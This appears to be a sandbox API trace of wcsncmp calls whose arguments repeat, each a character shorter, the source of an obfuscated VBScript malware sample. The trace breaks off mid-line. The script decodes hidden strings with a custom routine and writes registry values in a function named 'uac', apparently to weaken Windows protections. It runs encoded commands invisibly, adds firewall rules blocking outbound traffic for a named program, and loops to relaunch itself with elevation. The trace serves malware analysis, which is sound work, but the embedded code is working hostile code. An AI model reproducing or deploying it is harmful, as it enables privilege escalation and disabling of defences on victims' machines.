_String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.932] wcsncmp (_String1="bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0222.932] wcsncmp (_String1="mw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0222.932] wcsncmp (_String1="w(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0222.933] wcsncmp (_String1="(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.933] wcsncmp (_String1="s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = 